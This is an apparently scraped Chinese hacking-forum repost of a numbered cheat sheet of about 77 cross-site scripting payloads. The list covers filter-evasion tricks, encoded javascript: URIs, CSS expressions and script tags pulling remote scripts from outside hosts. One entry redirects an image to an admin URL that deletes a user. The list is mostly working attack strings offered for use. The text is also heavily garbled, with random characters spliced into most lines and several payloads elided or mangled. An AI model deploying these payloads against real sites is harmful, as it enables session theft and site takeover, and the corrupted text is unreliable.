貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。0 \# Z; A- l, M0 p$ t# O1 Q) F: O
(1)普通的XSS JavaScript注入
: H j4 _1 W) x$ r& @<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>; F& I @* _* u1 W/ h$ p
(2)IMG标签XSS使用JavaScript命令
) n- D. F/ X; o' {<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>* |8 o# z# i$ N6 W6 h+ [
(3)IMG标签无分号无引号
5 S& h+ Y2 Y' j# w- y$ X<IMG SRC=javascript:alert(‘XSS’)>
2 @( w" t- v) `% J. H3 A(4)IMG标签大小写不敏感
: l! s: o8 \& o$ h$ |/ N- @<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
. @; T% k, R, W' g- ^( I; ~, \7 v(5)HTML编码(必须有分号)& u9 T5 {$ t3 c$ n+ P V T
<IMG SRC=javascript:alert(“XSS”)> J o7 t H8 X$ \/ p
(6)修正缺陷IMG标签
9 S8 V$ q' p' x( d1 F<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
' J H" Z) a p# v ^/ r1 b: u7 J4 @4 t7 E, t$ v" W+ J
. w* [) Z) c/ Z- j, `' i
(7)formCharCode标签(计算器)
7 X1 y$ y4 C1 }( e<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
" {, Y5 K3 d' H(8)UTF-8的Unicode编码(计算器)1 V! T( A& L/ O
<IMG SRC=jav..省略..S')>
# |3 O2 B% ]! T5 w: t$ V- b(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
7 f. I) s7 |! o. z7 Y<IMG SRC=jav..省略..S')>2 k' y8 U% F( _3 U
(10)十六进制编码也是没有分号(计算器)
6 G' b0 a5 H6 Q; x+ ^, x<IMG SRC=java..省略..XSS')>8 k' b% O$ f. S! G. x6 z. t) ?
(11)嵌入式标签,将Javascript分开3 ~; u0 R0 v2 U* _7 ]1 g' @
<IMG SRC=”jav ascript:alert(‘XSS’);”>! v% m6 l/ Q6 s2 Z4 M
(12)嵌入式编码标签,将Javascript分开7 S) n0 i: H" W
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 U5 U$ N/ W6 E) N5 o1 E; N6 u, I(13)嵌入式换行符
* m: C& M1 k* X7 y<IMG SRC=”jav ascript:alert(‘XSS’);”>
% l% R- x- I9 H5 a& |% Z(14)嵌入式回车, Q- y7 i' }/ Y" x6 K8 h
<IMG SRC=”jav ascript:alert(‘XSS’);”>3 s" P) t& V5 }+ N) _
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
3 g$ Q' W& `' G; P+ T<IMG SRC=”javascript:alert(‘XSS‘)”>3 l' u4 C7 T' I' H5 ]) c
(16)解决限制字符(要求同页面)( H2 ~" i$ M2 T3 x
<script>z=’document.’</script>
4 r) v' t2 n1 Y0 {: Q0 p0 B<script>z=z+’write(“‘</script>
8 R! T, B4 i% V$ R! N6 ~' N' [<script>z=z+’<script’</script>
9 ^0 i! V& K* a2 S6 G! a% |. x<script>z=z+’ src=ht’</script>
1 F1 Y# f& A" A( b l9 G<script>z=z+’tp://ww’</script> y+ g$ N2 t3 Y n
<script>z=z+’w.shell’</script>
& c6 }" Z( Q3 V r<script>z=z+’.net/1.’</script>+ d- |- r ^* S7 B# L% l5 e
<script>z=z+’js></sc’</script>
0 e2 `( @2 l& H7 x7 W<script>z=z+’ript>”)’</script>: E* v. q/ r' x9 e+ h: |
<script>eval_r(z)</script>) Y# @" q3 c) i% M. C: k5 N6 l
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
4 y1 t4 K4 x! `' U! J% G2 ]https://www.t00ls.net/viewthread ... table&tid=15267 2/69 h0 |+ n) x: [- H7 _
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out+ s; h( l! h7 ^- Q* p& K
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用3 d# {# f$ v5 O! c9 h5 y" F
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out5 c2 N D% t! a C. D' z f
(19)Spaces和meta前的IMG标签
- l) M1 s9 r0 n9 }0 U. `- o<IMG SRC=” javascript:alert(‘XSS’);”>
4 G( E. R, u5 J( k0 Z4 P2 ^(20)Non-alpha-non-digit XSS
! z- \7 p# L' P* Y<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>- }9 t/ z: u- m) G( O
(21)Non-alpha-non-digit XSS to 2
2 I2 P8 b/ L4 ?! k<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>6 Q5 _) O% z, Q4 D2 Y6 G2 m, T
(22)Non-alpha-non-digit XSS to 3
6 k5 B0 b, g, Z<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>1 d K% @- S3 I3 O1 k0 q
(23)双开括号& t e( Z! q: d- l& o4 X
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
/ J" e# o1 z( L6 f/ D* Z' E7 ?. m(24)无结束脚本标记(仅火狐等浏览器)
1 c0 ^2 {9 B7 }$ N6 ^<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>- @9 y& k) d7 }" w/ [
(25)无结束脚本标记2
" H$ q& ?% i& D<SCRIPT SRC=//3w.org/XSS/xss.js>/ D5 u, V% n) g# }/ h
(26)半开的HTML/JavaScript XSS
. Y# }) g# O. R* R<IMG SRC=”javascript:alert(‘XSS’)”5 x" P( |- G3 k1 Y9 W) |3 o1 C
(27)双开角括号8 G. c7 w1 p7 R6 C3 [
<iframe src=http://3w.org/XSS.html <
+ q& ?9 ]4 Q1 [9 Z& _(28)无单引号 双引号 分号
D0 B8 X0 Y7 o8 t/ y<SCRIPT>a=/XSS/0 w2 a0 l* R8 b3 T$ v j! F
alert(a.source)</SCRIPT>- ~2 C" C9 s$ S) V/ z
(29)换码过滤的JavaScript& b4 v/ x* u; h; J7 P! O: u& D/ H0 O
\”;alert(‘XSS’);//
% D/ u' z+ J& _; ]# ^5 r(30)结束Title标签
7 E4 t" i* i* {4 y9 n: N6 ?/ ~, c</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
# k! T* Z& |) \(31)Input Image6 \- q8 o$ \1 x7 T \
<INPUT SRC=”javascript:alert(‘XSS’);”>5 [! S i5 ~# B/ n L
(32)BODY Image
+ u( k# L! O# b s& s<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
$ \1 u- k4 Q7 N(33)BODY标签- o$ W7 Q5 d" \% z" [$ T8 u0 f# W
<BODY(‘XSS’)>& S5 V( c+ \2 }3 P7 @
(34)IMG Dynsrc
9 Q6 r+ E% t& k9 O9 a<IMG DYNSRC=”javascript:alert(‘XSS’)”>
5 \0 I& D; x$ q, K# c j2 W(35)IMG Lowsrc$ t; o ], u% S! _
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
4 r# N. R# A. H& ]2 s/ b(36)BGSOUND
* L; i* m, o5 n<BGSOUND SRC=”javascript:alert(‘XSS’);”>
* { ~! t. q0 U7 L* \$ H. H(37)STYLE sheet
9 ]- M. F. Z+ `<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
+ z) D. _3 c1 o' `0 ? N(38)远程样式表
7 e' y% I4 J f' n4 i' d<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
S% O# D" c, V! R4 ^; s5 m- V2 a- S" W(39)List-style-image(列表式)5 F9 M% O, M+ @
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS% Z) H, l- r% o `/ C/ Z, A
(40)IMG VBscript
+ i* w$ H- Z) `" l3 P, l/ f. L<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS1 B2 k6 i4 n# y& {
(41)META链接url
; o% H, u% P5 k$ H
V, @6 i" e: J' |5 k
1 ^+ X% N6 P) ?; ?+ x<META HTTP-EQUIV=”refresh” CONTENT=”0;
8 p0 k8 j* q, ^9 h, `! KURL=http://;URL=javascript:alert(‘XSS’);”>
) a1 V0 r& a2 c(42)Iframe3 o% I% f/ j: P' q& S0 W
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
" q- W5 E5 S4 Y5 D(43)Frame0 W. G" q- s' z& G) `9 n
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board/ c- {! Q/ w( Y) L7 x
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
: G& V0 O2 T' W& t9 Z! `& J* ~1 M: s(44)Table
- k) V/ f; ~3 \$ E2 D( p7 o<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
! N; f m P) K9 j Q0 [) e(45)TD! P/ p5 y, H I2 K6 u# E) ?
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
8 }$ k: d9 N+ E* u" T+ p) B- B(46)DIV background-image
* G* g2 J" L1 }1 t; C3 Q6 n<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
3 |! h; M" s; P(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-( e: ^- V% F( F9 [" q4 m& k
8&13&12288&65279)
3 R4 ?8 X: Z. ^/ F% j<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
$ e( X% O2 }: o. K' D- x. p7 c/ p(48)DIV expression Y& z2 ]4 n' a: Z
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
3 w6 G8 A m8 ^8 X(49)STYLE属性分拆表达9 a- z1 Q+ U/ \4 R+ I. C
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
! T3 I ?5 t' a! E; b+ |(50)匿名STYLE(组成:开角号和一个字母开头)
" C1 L3 J# c+ \/ h( y5 V. \<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
* c- f* O( p. F: X# `1 D' l! Q(51)STYLE background-image! y: ?1 I# i4 ?9 A) ~: r
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A+ I6 ^8 w/ q: D5 R8 g9 Z2 m
CLASS=XSS></A>
( N) ~' \2 U1 ~+ l(52)IMG STYLE方式
; B/ B9 }! l* I' `" w7 K" i9 r) Sexppression(alert(“XSS”))’>( L$ J' u% s( k# ^: e0 `- e
(53)STYLE background6 @# j" ^, W2 u3 @8 A3 N( }
<STYLE><STYLE
7 \# x- ]# u9 j" H+ jtype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>: ^* Q6 n. K2 c. o" e# k
(54)BASE% e' T( |# {! p G0 `0 \
<BASE HREF=”javascript:alert(‘XSS’);//”>" O; F6 |7 A B3 l) I
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS! n. o% k* j0 ~
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
, V+ f6 ]3 ?0 ^6 I(56)在flash中使用ActionScrpt可以混进你XSS的代码
( V! d- o/ Q2 Y3 Q( z. e/ _a=”get”;
+ Y% y* ?) q4 q( `: hb=”URL(\”";& a7 S u2 K3 i8 r7 v9 X
c=”javascript:”;
% f: K* a/ K0 X- qd=”alert(‘XSS’);\”)”;
' i. d6 _1 t0 M3 {; y5 ?. U& ?eval_r(a+b+c+d);8 _' l' h7 _ ^9 L0 L! Q
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
! p' u: }, e8 n3 L& ~( e& J<HTML xmlns:xss>/ E. i8 q2 k1 j5 i3 A
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
& m' O5 ~/ W6 U3 s6 B<xss:xss>XSS</xss:xss>2 D$ t& b0 F, I7 m
</HTML>
3 s) N5 s/ F5 W. W! a8 a; y(58)如果过滤了你的JS你可以在图片里添加JS代码来利用" _3 a1 f6 @/ {+ _& F2 G
<SCRIPT SRC=””></SCRIPT>
' N2 S, @; g) ?5 e, P(59)IMG嵌入式命令,可执行任意命令6 x S8 \" _+ c# ^1 P4 Y
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
' y! m8 l+ ]) i, ^* D(60)IMG嵌入式命令(a.jpg在同服务器)
9 n( e9 K# l. A0 B! ^% f! Y R1 [Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
3 K" Y5 G$ W4 [$ f% ](61)绕符号过滤$ t3 n! K0 O7 ~: ?
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>& |9 G+ S( C9 A0 F: e
(62)6 i4 f/ j- L+ l
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 q* O0 z" h9 j8 g9 {(63)& Y4 o2 x2 \, C
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
, j O* l. {; ~+ I2 B- f- C(64)
a5 b7 t6 c' M$ T. d- c$ }' t! B! x<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
. V; {$ d* b7 B! e8 g5 p" }) O5 n(65)
: o2 @+ d5 e2 f+ E<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>' Q0 S' h$ z) e* ]! r
(66)12-7-1 T00LS - Powered by Discuz! Board
1 J# ~. c, B5 ^4 J! N" mhttps://www.t00ls.net/viewthread ... table&tid=15267 4/62 Q5 A: s, U# H6 H, B
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>5 L# S4 `! r8 ^. ~" y
(67)/ p9 r- `! `0 T0 Z
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”># g+ q) S0 ^2 [& U6 R4 M6 a
</SCRIPT>5 f) M/ |* [2 p. Z* c
(68)URL绕行; [/ m: |2 i3 Q) {7 x
<A HREF=”http://127.0.0.1/”>XSS</A>
. \ o0 v( G4 D. S3 U% W+ g* C& h6 f(69)URL编码, X% w0 S& \% I2 r0 ] c
<A HREF=”http://3w.org”>XSS</A>
; M$ R6 n) z! W, r6 ~. D(70)IP十进制
! B C- F% a+ Q<A HREF=”http://3232235521″>XSS</A>
5 u5 ~6 v+ A9 |( v, V/ v(71)IP十六进制
5 Z8 i9 J! W4 A9 S. \$ @<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
% [$ V. I' A5 D* I(72)IP八进制- T% Z$ Q9 f# U) Z' L$ C
<A HREF=”http://0300.0250.0000.0001″>XSS</A>7 Z9 o1 K t! b, e" p* L$ W
(73)混合编码
: h) P) G' U) W- u1 A<A HREF=”h! r8 ~- N5 o" x6 t
tt p://6 6.000146.0×7.147/”">XSS</A>) g* L/ G! J0 d6 S/ }9 k- U L+ z ^7 x
(74)节省[http:]3 R- a$ r6 {* M- n
<A HREF=”//www.google.com/”>XSS</A>
% R( h7 [: h' U* C) u(75)节省[www]# |+ R+ u3 {9 J i5 `0 H
<A HREF=”http://google.com/”>XSS</A>
; c7 }1 } y3 n# W: x(76)绝对点绝对DNS# N8 ]& ]* g( j7 {, b
<A HREF=”http://www.google.com./”>XSS</A>4 W# N- O! m2 w1 F. T
(77)javascript链接
( u2 k+ T0 i0 ~" M8 I<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>% E, Z+ b* A$ a: S: B! `1 v$ s
; e& f6 o( `; _* o% i% e4 M( D原文地址:http://fuzzexp.org/u/0day/?p=146 W6 ^) K2 J" a
# ^& d4 N) o# i6 \4 q( n' K
|
发表于 2013-4-19 19:22:37
收藏
支持
反对